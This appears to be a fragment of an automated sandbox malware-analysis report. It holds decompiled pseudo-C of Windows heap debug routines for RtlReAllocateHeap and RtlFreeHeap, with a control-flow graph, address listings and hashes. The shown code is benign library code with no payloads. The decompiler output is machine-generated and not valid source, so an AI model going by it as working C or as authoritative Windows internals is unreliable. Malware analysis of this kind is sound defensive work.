                                                                            control_flow_graph 843 1d87fdf4-1d87fe16 call 1d827be4 846 1d87fe35-1d87fe4d call 1d7c7662 843->846 847 1d87fe18-1d87fe30 RtlDebugPrintTimes 843->847 852 1d87fe53-1d87fe69 846->852 853 1d880277 846->853 851 1d8802d1-1d8802e0 847->851 855 1d87fe70-1d87fe72 852->855 856 1d87fe6b-1d87fe6e 852->856 854 1d88027a-1d8802ce call 1d8802e6 853->854 854->851 858 1d87fe73-1d87fe8a 855->858 856->858 860 1d87fe90-1d87fe93 858->860 861 1d880231-1d88023a GetPEB 858->861 860->861 862 1d87fe99-1d87fea2 860->862 864 1d880259-1d88025e call 1d7cb910 861->864 865 1d88023c-1d880257 GetPEB call 1d7cb910 861->865 866 1d87fea4-1d87febb call 1d7dfed0 862->866 867 1d87febe-1d87fed1 call 1d880835 862->867 873 1d880263-1d880274 call 1d7cb910 864->873 865->873 866->867 878 1d87fed3-1d87feda 867->878 879 1d87fedc-1d87fef0 call 1d7c753f 867->879 873->853 878->879 882 1d87fef6-1d87ff02 GetPEB 879->882 883 1d880122-1d880127 879->883 884 1d87ff04-1d87ff07 882->884 885 1d87ff70-1d87ff7b 882->885 883->854 886 1d88012d-1d880139 GetPEB 883->886 889 1d87ff26-1d87ff2b call 1d7cb910 884->889 890 1d87ff09-1d87ff24 GetPEB call 1d7cb910 884->890 887 1d880068-1d88007a call 1d7e2710 885->887 888 1d87ff81-1d87ff88 885->888 891 1d88013b-1d88013e 886->891 892 1d8801a7-1d8801b2 886->892 911 1d880110-1d88011d call 1d880d24 call 1d880835 887->911 912 1d880080-1d880087 887->912 888->887 897 1d87ff8e-1d87ff97 888->897 901 1d87ff30-1d87ff51 call 1d7cb910 GetPEB 889->901 890->901 893 1d88015d-1d880162 call 1d7cb910 891->893 894 1d880140-1d88015b GetPEB call 1d7cb910 891->894 892->854 898 1d8801b8-1d8801c3 892->898 910 1d880167-1d88017b call 1d7cb910 893->910 894->910 904 1d87ff99-1d87ffa9 897->904 905 1d87ffb8-1d87ffbc 897->905 898->854 906 1d8801c9-1d8801d4 898->906 901->887 931 1d87ff57-1d87ff6b 901->931 904->905 913 1d87ffab-1d87ffb5 call 1d88d646 904->913 915 1d87ffce-1d87ffd4 905->915 916 1d87ffbe-1d87ffcc call 1d803ae9 905->916 906->854 914 1d8801da-1d8801e3 GetPEB 906->914 942 1d88017e-1d880188 GetPEB 910->942 911->883 920 1d880089-1d880090 912->920 921 1d880092-1d88009a 912->921 913->905 924 1d880202-1d880207 call 1d7cb910 914->924 925 1d8801e5-1d880200 GetPEB call 1d7cb910 914->925 917 1d87ffd7-1d87ffe0 915->917 916->917 929 1d87fff2-1d87fff5 917->929 930 1d87ffe2-1d87fff0 917->930 920->921 933 1d8800b8-1d8800bc 921->933 934 1d88009c-1d8800ac 921->934 939 1d88020c-1d88022c call 1d87823a call 1d7cb910 924->939 925->939 940 1d87fff7-1d87fffe 929->940 941 1d880065 929->941 930->929 931->887 945 1d8800ec-1d8800f2 933->945 946 1d8800be-1d8800d1 call 1d803ae9 933->946 934->933 943 1d8800ae-1d8800b3 call 1d88d646 934->943 939->942 940->941 948 1d880000-1d88000b 940->948 941->887 942->854 950 1d88018e-1d8801a2 942->950 943->933 949 1d8800f5-1d8800fc 945->949 957 1d8800e3 946->957 958 1d8800d3-1d8800e1 call 1d7ffdb9 946->958 948->941 955 1d88000d-1d880016 GetPEB 948->955 949->911 956 1d8800fe-1d88010e 949->956 950->854 960 1d880018-1d880033 GetPEB call 1d7cb910 955->960 961 1d880035-1d88003a call 1d7cb910 955->961 956->911 963 1d8800e6-1d8800ea 957->963 958->963 969 1d88003f-1d88005d call 1d87823a call 1d7cb910 960->969 961->969 963->949 969->941
                                                                            C-Code - Quality: 64%
                                                                            			E1D87FDF4(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t130;
				signed int _t132;
				intOrPtr _t138;
				intOrPtr _t139;
				signed int _t149;
				signed int _t150;
				intOrPtr _t151;
				signed int _t152;
				intOrPtr _t155;
				intOrPtr _t159;
				intOrPtr _t172;
				signed int _t173;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t183;
				void* _t184;
				signed char _t192;
				signed int _t193;
				intOrPtr _t195;
				intOrPtr _t199;
				signed int _t209;
				signed int _t226;
				signed char _t236;
				intOrPtr _t240;
				signed int* _t248;
				signed int _t253;
				signed int _t255;
				signed int _t267;
				signed int _t278;
				signed int* _t279;
				intOrPtr* _t283;
				void* _t284;
				void* _t286;

				_push(0x40);
				_push(0x1d8ad430);
				E1D827BE4(__ebx, __edi, __esi);
				_t281 = __ecx;
				 *((intOrPtr*)(_t284 - 0x3c)) = __ecx;
				 *((char*)(_t284 - 0x19)) = 0;
				 *(_t284 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t284 - 4)) = 0;
					 *((intOrPtr*)(_t284 - 4)) = 1;
					_t130 = E1D7C7662("RtlReAllocateHeap");
					__eflags = _t130;
					if(_t130 == 0) {
						L72:
						 *(_t284 - 0x24) = 0;
						L73:
						 *((intOrPtr*)(_t284 - 4)) = 0;
						 *((intOrPtr*)(_t284 - 4)) = 0xfffffffe;
						E1D8802E6(_t281);
						_t132 =  *(_t284 - 0x24);
						goto L75;
					}
					_t236 =  *(__ecx + 0x44) | __edx;
					 *(_t284 - 0x30) = _t236;
					 *(_t284 - 0x34) = _t236 | 0x10000100;
					__eflags =  *(_t284 + 0xc);
					if( *(_t284 + 0xc) == 0) {
						_t267 = 1;
						__eflags = 1;
					} else {
						_t267 =  *(_t284 + 0xc);
					}
					_t138 = ( *((intOrPtr*)(_t281 + 0x94)) + _t267 &  *(_t281 + 0x98)) + 8;
					 *((intOrPtr*)(_t284 - 0x40)) = _t138;
					__eflags = _t138 -  *(_t284 + 0xc);
					if(_t138 <  *(_t284 + 0xc)) {
						L68:
						_t139 =  *[fs:0x30];
						__eflags =  *(_t139 + 0xc);
						if( *(_t139 + 0xc) == 0) {
							_push("HEAP: ");
							E1D7CB910();
						} else {
							E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t281 + 0x78)));
						E1D7CB910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t284 + 0xc));
						goto L72;
					}
					__eflags = _t138 -  *((intOrPtr*)(_t281 + 0x78));
					if(_t138 >  *((intOrPtr*)(_t281 + 0x78))) {
						goto L68;
					}
					 *(_t284 - 0x20) = 0;
					__eflags = _t236 & 0x00000001;
					if((_t236 & 0x00000001) == 0) {
						E1D7DFED0( *((intOrPtr*)(_t281 + 0xc8)));
						 *((char*)(_t284 - 0x19)) = 1;
						_t226 =  *(_t284 - 0x30) | 0x10000101;
						__eflags = _t226;
						 *(_t284 - 0x34) = _t226;
					}
					E1D880835(_t281, 0);
					_t277 =  *((intOrPtr*)(_t284 + 8));
					_t269 = _t277 - 8;
					__eflags =  *((char*)(_t269 + 7)) - 5;
					if( *((char*)(_t269 + 7)) == 5) {
						_t269 = _t269 - (( *(_t269 + 6) & 0x000000ff) << 3);
						__eflags = _t269;
					}
					 *(_t284 - 0x2c) = _t269;
					 *(_t284 - 0x28) = _t269;
					_t240 = _t281;
					_t149 = E1D7C753F(_t240, _t269, "RtlReAllocateHeap");
					__eflags = _t149;
					if(_t149 == 0) {
						L53:
						_t150 =  *(_t284 - 0x24);
						__eflags = _t150;
						if(_t150 == 0) {
							goto L73;
						}
						__eflags = _t150 -  *0x1d8c47c8; // 0x0
						_t151 =  *[fs:0x30];
						if(__eflags != 0) {
							_t152 =  *(_t151 + 0x68);
							 *(_t284 - 0x48) = _t152;
							__eflags = _t152 & 0x00000800;
							if((_t152 & 0x00000800) == 0) {
								goto L73;
							}
							__eflags =  *(_t284 - 0x20) -  *0x1d8c47cc; // 0x0
							if(__eflags != 0) {
								goto L73;
							}
							__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x1d8c47ce; // 0x0
							if(__eflags != 0) {
								goto L73;
							}
							_t155 =  *[fs:0x30];
							__eflags =  *(_t155 + 0xc);
							if( *(_t155 + 0xc) == 0) {
								_push("HEAP: ");
								E1D7CB910();
							} else {
								E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(E1D87823A(_t281,  *(_t284 - 0x20)));
							_push( *(_t284 + 0xc));
							E1D7CB910("Just reallocated block at %p to 0x%Ix bytes with tag %ws\n",  *(_t284 - 0x24));
							L59:
							_t159 =  *[fs:0x30];
							__eflags =  *((char*)(_t159 + 2));
							if( *((char*)(_t159 + 2)) != 0) {
								 *0x1d8c47a1 = 1;
								 *0x1d8c4100 = 0;
								asm("int3");
								 *0x1d8c47a1 = 0;
							}
							goto L73;
						}
						__eflags =  *(_t151 + 0xc);
						if( *(_t151 + 0xc) == 0) {
							_push("HEAP: ");
							E1D7CB910();
						} else {
							E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *(_t284 + 0xc));
						E1D7CB910("Just reallocated block at %p to %Ix bytes\n",  *0x1d8c47c8);
						goto L59;
					} else {
						__eflags = _t277 -  *0x1d8c47c8; // 0x0
						_t172 =  *[fs:0x30];
						if(__eflags != 0) {
							_t173 =  *(_t172 + 0x68);
							 *(_t284 - 0x44) = _t173;
							__eflags = _t173 & 0x00000800;
							if((_t173 & 0x00000800) == 0) {
								L38:
								_t174 = E1D7E2710(_t281,  *(_t284 - 0x34), _t277,  *(_t284 + 0xc));
								 *(_t284 - 0x24) = _t174;
								__eflags = _t174;
								if(_t174 != 0) {
									_t75 = _t174 - 8; // -8
									_t278 = _t75;
									__eflags =  *((char*)(_t278 + 7)) - 5;
									if( *((char*)(_t278 + 7)) == 5) {
										_t278 = _t278 - (( *(_t278 + 6) & 0x000000ff) << 3);
										__eflags = _t278;
									}
									_t248 = _t278;
									 *(_t284 - 0x28) = _t278;
									__eflags =  *(_t281 + 0x4c);
									if( *(_t281 + 0x4c) != 0) {
										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
										__eflags =  *(_t278 + 3) - (_t248[0] ^ _t248[0] ^  *_t248);
										if(__eflags != 0) {
											_push(_t248);
											_t269 = _t278;
											E1D88D646(0, _t281, _t278, _t278, _t281, __eflags);
										}
									}
									__eflags =  *(_t278 + 2) & 0x00000002;
									if(( *(_t278 + 2) & 0x00000002) == 0) {
										_t177 =  *(_t278 + 3);
										 *(_t284 - 0x1b) = _t177;
										_t178 = _t177 & 0x000000ff;
									} else {
										_t183 = E1D803AE9(_t278);
										 *(_t284 - 0x30) = _t183;
										__eflags =  *(_t281 + 0x40) & 0x08000000;
										if(( *(_t281 + 0x40) & 0x08000000) == 0) {
											 *_t183 = 0;
										} else {
											_t184 = E1D7FFDB9(1, _t269);
											_t253 =  *(_t284 - 0x30);
											 *_t253 = _t184;
											_t183 = _t253;
										}
										_t178 =  *((intOrPtr*)(_t183 + 2));
									}
									 *(_t284 - 0x20) = _t178;
									__eflags =  *(_t281 + 0x4c);
									if( *(_t281 + 0x4c) != 0) {
										 *(_t278 + 3) =  *(_t278 + 2) ^  *(_t278 + 1) ^  *_t278;
										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
										__eflags =  *_t278;
									}
								}
								E1D880D24(_t281);
								__eflags = 0;
								E1D880835(_t281, 0);
								goto L53;
							}
							__eflags =  *0x1d8c47cc;
							if( *0x1d8c47cc == 0) {
								goto L38;
							}
							_t279 =  *(_t284 - 0x28);
							_t269 =  *(_t284 - 0x2c);
							__eflags =  *(_t281 + 0x4c);
							if( *(_t281 + 0x4c) != 0) {
								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
								__eflags = _t279[0] - ( *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269);
								if(__eflags != 0) {
									_push(_t240);
									E1D88D646(0, _t281, _t279, _t279, _t281, __eflags);
									_t269 =  *(_t284 - 0x2c);
								}
							}
							__eflags = _t279[0] & 0x00000002;
							if((_t279[0] & 0x00000002) == 0) {
								_t192 = _t279[0];
								 *(_t284 - 0x1a) = _t192;
								_t193 = _t192 & 0x000000ff;
							} else {
								_t209 = E1D803AE9(_t279);
								 *(_t284 - 0x30) = _t209;
								_t193 =  *(_t209 + 2) & 0x0000ffff;
							}
							_t255 = _t193;
							 *(_t284 - 0x20) = _t193;
							__eflags =  *(_t281 + 0x4c);
							if( *(_t281 + 0x4c) != 0) {
								_t279[0] =  *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269;
								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
								__eflags =  *_t279;
							}
							__eflags = _t255;
							if(_t255 == 0) {
								L37:
								_t277 =  *((intOrPtr*)(_t284 + 8));
							} else {
								__eflags = _t255 -  *0x1d8c47cc; // 0x0
								if(__eflags != 0) {
									goto L37;
								}
								__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x1d8c47ce; // 0x0
								if(__eflags != 0) {
									goto L37;
								}
								_t195 =  *[fs:0x30];
								__eflags =  *(_t195 + 0xc);
								if( *(_t195 + 0xc) == 0) {
									_push("HEAP: ");
									E1D7CB910();
								} else {
									E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t269 =  *(_t284 - 0x20);
								_push(E1D87823A(_t281,  *(_t284 - 0x20)));
								_push( *(_t284 + 0xc));
								_t277 =  *((intOrPtr*)(_t284 + 8));
								E1D7CB910("About to rellocate block at %p to 0x%Ix bytes with tag %ws\n",  *((intOrPtr*)(_t284 + 8)));
								_t286 = _t286 + 0x10;
								L18:
								_t199 =  *[fs:0x30];
								__eflags =  *((char*)(_t199 + 2));
								if( *((char*)(_t199 + 2)) != 0) {
									 *0x1d8c47a1 = 1;
									 *0x1d8c4100 = 0;
									asm("int3");
									 *0x1d8c47a1 = 0;
								}
							}
							goto L38;
						}
						__eflags =  *(_t172 + 0xc);
						if( *(_t172 + 0xc) == 0) {
							_push("HEAP: ");
							E1D7CB910();
						} else {
							E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *(_t284 + 0xc));
						E1D7CB910("About to reallocate block at %p to %Ix bytes\n",  *0x1d8c47c8);
						_t286 = _t286 + 0xc;
						goto L18;
					}
				} else {
					_t283 =  *0x1d8c374c; // 0x0
					 *0x1d8c91e0(__ecx, __edx,  *((intOrPtr*)(_t284 + 8)),  *(_t284 + 0xc));
					_t132 =  *_t283();
					L75:
					 *[fs:0x0] =  *((intOrPtr*)(_t284 - 0x10));
					return _t132;
				}
			}





































                                                                            0x1d87fdf4
                                                                            0x1d87fdf6
                                                                            0x1d87fdfb
                                                                            0x1d87fe02
                                                                            0x1d87fe04
                                                                            0x1d87fe09
                                                                            0x1d87fe0c
                                                                            0x1d87fe16
                                                                            0x1d87fe35
                                                                            0x1d87fe38
                                                                            0x1d87fe46
                                                                            0x1d87fe4b
                                                                            0x1d87fe4d
                                                                            0x1d880277
                                                                            0x1d880277
                                                                            0x1d88027a
                                                                            0x1d88027a
                                                                            0x1d8802c2
                                                                            0x1d8802c9
                                                                            0x1d8802ce
                                                                            0x00000000
                                                                            0x1d8802ce
                                                                            0x1d87fe56
                                                                            0x1d87fe58
                                                                            0x1d87fe62
                                                                            0x1d87fe65
                                                                            0x1d87fe69
                                                                            0x1d87fe72
                                                                            0x1d87fe72
                                                                            0x1d87fe6b
                                                                            0x1d87fe6b
                                                                            0x1d87fe6b
                                                                            0x1d87fe81
                                                                            0x1d87fe84
                                                                            0x1d87fe87
                                                                            0x1d87fe8a
                                                                            0x1d880231
                                                                            0x1d880231
                                                                            0x1d880237
                                                                            0x1d88023a
                                                                            0x1d880259
                                                                            0x1d88025e
                                                                            0x1d88023c
                                                                            0x1d880251
                                                                            0x1d880256
                                                                            0x1d880264
                                                                            0x1d88026f
                                                                            0x00000000
                                                                            0x1d880274
                                                                            0x1d87fe90
                                                                            0x1d87fe93
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d87fe9b
                                                                            0x1d87fe9f
                                                                            0x1d87fea2
                                                                            0x1d87feaa
                                                                            0x1d87feaf
                                                                            0x1d87feb6
                                                                            0x1d87feb6
                                                                            0x1d87febb
                                                                            0x1d87febb
                                                                            0x1d87fec2
                                                                            0x1d87fec7
                                                                            0x1d87feca
                                                                            0x1d87fecd
                                                                            0x1d87fed1
                                                                            0x1d87feda
                                                                            0x1d87feda
                                                                            0x1d87feda
                                                                            0x1d87fedc
                                                                            0x1d87fedf
                                                                            0x1d87fee7
                                                                            0x1d87fee9
                                                                            0x1d87feee
                                                                            0x1d87fef0
                                                                            0x1d880122
                                                                            0x1d880122
                                                                            0x1d880125
                                                                            0x1d880127
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d88012d
                                                                            0x1d880133
                                                                            0x1d880139
                                                                            0x1d8801a7
                                                                            0x1d8801aa
                                                                            0x1d8801ad
                                                                            0x1d8801b2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8801bc
                                                                            0x1d8801c3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8801cd
                                                                            0x1d8801d4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8801da
                                                                            0x1d8801e0
                                                                            0x1d8801e3
                                                                            0x1d880202
                                                                            0x1d880207
                                                                            0x1d8801e5
                                                                            0x1d8801fa
                                                                            0x1d8801ff
                                                                            0x1d880218
                                                                            0x1d880219
                                                                            0x1d880224
                                                                            0x1d88017e
                                                                            0x1d88017e
                                                                            0x1d880184
                                                                            0x1d880188
                                                                            0x1d88018e
                                                                            0x1d880195
                                                                            0x1d88019b
                                                                            0x1d88019c
                                                                            0x1d88019c
                                                                            0x00000000
                                                                            0x1d880188
                                                                            0x1d88013b
                                                                            0x1d88013e
                                                                            0x1d88015d
                                                                            0x1d880162
                                                                            0x1d880140
                                                                            0x1d880155
                                                                            0x1d88015a
                                                                            0x1d880168
                                                                            0x1d880176
                                                                            0x00000000
                                                                            0x1d87fef6
                                                                            0x1d87fef6
                                                                            0x1d87fefc
                                                                            0x1d87ff02
                                                                            0x1d87ff70
                                                                            0x1d87ff73
                                                                            0x1d87ff76
                                                                            0x1d87ff7b
                                                                            0x1d880068
                                                                            0x1d880070
                                                                            0x1d880075
                                                                            0x1d880078
                                                                            0x1d88007a
                                                                            0x1d880080
                                                                            0x1d880080
                                                                            0x1d880083
                                                                            0x1d880087
                                                                            0x1d880090
                                                                            0x1d880090
                                                                            0x1d880090
                                                                            0x1d880092
                                                                            0x1d880094
                                                                            0x1d880097
                                                                            0x1d88009a
                                                                            0x1d88009f
                                                                            0x1d8800a9
                                                                            0x1d8800ac
                                                                            0x1d8800ae
                                                                            0x1d8800af
                                                                            0x1d8800b3
                                                                            0x1d8800b3
                                                                            0x1d8800ac
                                                                            0x1d8800b8
                                                                            0x1d8800bc
                                                                            0x1d8800ec
                                                                            0x1d8800ef
                                                                            0x1d8800f2
                                                                            0x1d8800be
                                                                            0x1d8800c0
                                                                            0x1d8800c5
                                                                            0x1d8800ca
                                                                            0x1d8800d1
                                                                            0x1d8800e3
                                                                            0x1d8800d3
                                                                            0x1d8800d4
                                                                            0x1d8800d9
                                                                            0x1d8800dc
                                                                            0x1d8800df
                                                                            0x1d8800df
                                                                            0x1d8800e6
                                                                            0x1d8800e6
                                                                            0x1d8800f5
                                                                            0x1d8800f9
                                                                            0x1d8800fc
                                                                            0x1d880108
                                                                            0x1d88010e
                                                                            0x1d88010e
                                                                            0x1d88010e
                                                                            0x1d8800fc
                                                                            0x1d880114
                                                                            0x1d880119
                                                                            0x1d88011d
                                                                            0x00000000
                                                                            0x1d88011d
                                                                            0x1d87ff81
                                                                            0x1d87ff88
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d87ff8e
                                                                            0x1d87ff91
                                                                            0x1d87ff94
                                                                            0x1d87ff97
                                                                            0x1d87ff9c
                                                                            0x1d87ffa6
                                                                            0x1d87ffa9
                                                                            0x1d87ffab
                                                                            0x1d87ffb0
                                                                            0x1d87ffb5
                                                                            0x1d87ffb5
                                                                            0x1d87ffa9
                                                                            0x1d87ffb8
                                                                            0x1d87ffbc
                                                                            0x1d87ffce
                                                                            0x1d87ffd1
                                                                            0x1d87ffd4
                                                                            0x1d87ffbe
                                                                            0x1d87ffc0
                                                                            0x1d87ffc5
                                                                            0x1d87ffc8
                                                                            0x1d87ffc8
                                                                            0x1d87ffd7
                                                                            0x1d87ffd9
                                                                            0x1d87ffdd
                                                                            0x1d87ffe0
                                                                            0x1d87ffea
                                                                            0x1d87fff0
                                                                            0x1d87fff0
                                                                            0x1d87fff0
                                                                            0x1d87fff2
                                                                            0x1d87fff5
                                                                            0x1d880065
                                                                            0x1d880065
                                                                            0x1d87fff7
                                                                            0x1d87fff7
                                                                            0x1d87fffe
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d880004
                                                                            0x1d88000b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d88000d
                                                                            0x1d880013
                                                                            0x1d880016
                                                                            0x1d880035
                                                                            0x1d88003a
                                                                            0x1d880018
                                                                            0x1d88002d
                                                                            0x1d880032
                                                                            0x1d880040
                                                                            0x1d88004b
                                                                            0x1d88004c
                                                                            0x1d88004f
                                                                            0x1d880058
                                                                            0x1d88005d
                                                                            0x1d87ff47
                                                                            0x1d87ff47
                                                                            0x1d87ff4d
                                                                            0x1d87ff51
                                                                            0x1d87ff57
                                                                            0x1d87ff5e
                                                                            0x1d87ff64
                                                                            0x1d87ff65
                                                                            0x1d87ff65
                                                                            0x1d87ff51
                                                                            0x00000000
                                                                            0x1d87fff5
                                                                            0x1d87ff04
                                                                            0x1d87ff07
                                                                            0x1d87ff26
                                                                            0x1d87ff2b
                                                                            0x1d87ff09
                                                                            0x1d87ff1e
                                                                            0x1d87ff23
                                                                            0x1d87ff31
                                                                            0x1d87ff3f
                                                                            0x1d87ff44
                                                                            0x00000000
                                                                            0x1d87ff44
                                                                            0x1d87fe18
                                                                            0x1d87fe20
                                                                            0x1d87fe28
                                                                            0x1d87fe2e
                                                                            0x1d8802d1
                                                                            0x1d8802d4
                                                                            0x1d8802e0
                                                                            0x1d8802e0

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                            • API String ID: 3446177414-1700792311
                                                                            • Opcode ID: 5ef034228975d8ea0595724200e37fd13ebc3564f2000d6213a23cd7c42cdbfd
                                                                            • Instruction ID: 18284fde303990b6af297de53343ca3c1c0642c081b79b51db01eda24d3386f5
                                                                            • Opcode Fuzzy Hash: 5ef034228975d8ea0595724200e37fd13ebc3564f2000d6213a23cd7c42cdbfd
                                                                            • Instruction Fuzzy Hash: DBD1CF3590469ADFCB02CFA8C844ABDBBF6FF49720F058059F5459B263C735A942DB12
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D87F8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 67%
                                                                            			E1D87F8F8(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t73;
				signed int _t75;
				signed int _t79;
				intOrPtr _t81;
				signed int _t82;
				signed char _t86;
				signed int _t87;
				intOrPtr _t89;
				intOrPtr _t93;
				intOrPtr _t103;
				signed int _t120;
				signed char _t131;
				intOrPtr _t133;
				signed int _t136;
				signed int _t151;
				signed int* _t154;
				signed int _t158;
				signed int* _t160;
				intOrPtr* _t164;
				void* _t165;

				_push(0x34);
				_push(0x1d8ad2f8);
				E1D827BE4(__ebx, __edi, __esi);
				 *(_t165 - 0x34) = __edx;
				_t162 = __ecx;
				 *((intOrPtr*)(_t165 - 0x30)) = __ecx;
				_t158 = 0;
				 *(_t165 - 0x28) = 0;
				 *((char*)(_t165 - 0x19)) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t165 - 4)) = 0;
					 *((intOrPtr*)(_t165 - 4)) = 1;
					_t73 = E1D7C7662("RtlFreeHeap");
					__eflags = _t73;
					if(_t73 == 0) {
						_t158 = 0;
						 *(_t165 - 0x28) = 0;
						L34:
						 *((intOrPtr*)(_t165 - 4)) = 0;
						 *((intOrPtr*)(_t165 - 4)) = 0xfffffffe;
						E1D87FBB7();
						_t75 = _t158;
						goto L35;
					}
					_t131 =  *(__ecx + 0x44) |  *(_t165 - 0x34);
					 *(_t165 - 0x2c) = _t131;
					 *(_t165 - 0x34) = _t131 | 0x10000000;
					__eflags = _t131 & 0x00000001;
					if((_t131 & 0x00000001) == 0) {
						E1D7DFED0( *((intOrPtr*)(__ecx + 0xc8)));
						 *((char*)(_t165 - 0x19)) = 1;
						_t120 =  *(_t165 - 0x2c) | 0x10000001;
						__eflags = _t120;
						 *(_t165 - 0x34) = _t120;
					}
					E1D880835(_t162, 0);
					_t151 =  *((intOrPtr*)(_t165 + 8)) + 0xfffffff8;
					__eflags =  *((char*)(_t151 + 7)) - 5;
					if( *((char*)(_t151 + 7)) == 5) {
						_t151 = _t151 - (( *(_t151 + 6) & 0x000000ff) << 3);
						__eflags = _t151;
					}
					 *(_t165 - 0x24) = _t151;
					 *(_t165 - 0x2c) = _t151;
					_t133 = _t162;
					_t79 = E1D7C753F(_t133, _t151, "RtlFreeHeap");
					__eflags = _t79;
					if(_t79 == 0) {
						goto L34;
					} else {
						__eflags =  *((intOrPtr*)(_t165 + 8)) -  *0x1d8c47d0; // 0x0
						_t81 =  *[fs:0x30];
						if(__eflags != 0) {
							_t82 =  *(_t81 + 0x68);
							 *(_t165 - 0x3c) = _t82;
							__eflags = _t82 & 0x00000800;
							if((_t82 & 0x00000800) == 0) {
								L32:
								_t158 = E1D7E3BC0(_t162,  *(_t165 - 0x34),  *((intOrPtr*)(_t165 + 8)));
								 *(_t165 - 0x28) = _t158;
								E1D880D24( *((intOrPtr*)(_t165 - 0x30)));
								E1D880835( *((intOrPtr*)(_t165 - 0x30)), 0);
								goto L34;
							}
							__eflags =  *0x1d8c47d4;
							if( *0x1d8c47d4 == 0) {
								goto L32;
							}
							_t160 =  *(_t165 - 0x2c);
							_t154 =  *(_t165 - 0x24);
							__eflags =  *(_t162 + 0x4c);
							if( *(_t162 + 0x4c) != 0) {
								 *_t160 =  *_t160 ^  *(_t162 + 0x50);
								_t38 =  &(_t154[0]); // 0xffff
								_t39 =  &(_t154[0]); // 0xffffff
								__eflags = _t160[0] - ( *_t38 ^  *_t39 ^  *_t154);
								if(__eflags != 0) {
									_push(_t133);
									E1D88D646(0, _t162, _t160, _t160, _t162, __eflags);
									_t154 =  *(_t165 - 0x24);
								}
							}
							__eflags = _t160[0] & 0x00000002;
							if((_t160[0] & 0x00000002) == 0) {
								_t86 = _t160[0];
								 *(_t165 - 0x1a) = _t86;
								_t87 = _t86 & 0x000000ff;
							} else {
								_t103 = E1D803AE9(_t160);
								 *((intOrPtr*)(_t165 - 0x40)) = _t103;
								_t87 =  *(_t103 + 2) & 0x0000ffff;
							}
							_t136 = _t87;
							 *(_t165 - 0x20) = _t87;
							__eflags =  *(_t162 + 0x4c);
							if( *(_t162 + 0x4c) != 0) {
								_t51 =  &(_t154[0]); // 0xffff
								_t52 =  &(_t154[0]); // 0xffffff
								_t160[0] =  *_t51 ^  *_t52 ^  *_t154;
								 *_t160 =  *_t160 ^  *(_t162 + 0x50);
								__eflags =  *_t160;
							}
							__eflags = _t136;
							if(_t136 != 0) {
								__eflags = _t136 -  *0x1d8c47d4; // 0x0
								if(__eflags != 0) {
									goto L32;
								}
								__eflags =  *((intOrPtr*)(_t162 + 0x7c)) -  *0x1d8c47d6; // 0x0
								if(__eflags != 0) {
									goto L32;
								}
								_t89 =  *[fs:0x30];
								__eflags =  *(_t89 + 0xc);
								if( *(_t89 + 0xc) == 0) {
									_push("HEAP: ");
									E1D7CB910();
								} else {
									E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E1D87823A(_t162,  *(_t165 - 0x20)));
								E1D7CB910("About to free block at %p with tag %ws\n",  *((intOrPtr*)(_t165 + 8)));
								L30:
								_t93 =  *[fs:0x30];
								__eflags =  *((char*)(_t93 + 2));
								if( *((char*)(_t93 + 2)) != 0) {
									 *0x1d8c47a1 = 1;
									 *0x1d8c4100 = 0;
									asm("int3");
									 *0x1d8c47a1 = 0;
								}
							}
							goto L32;
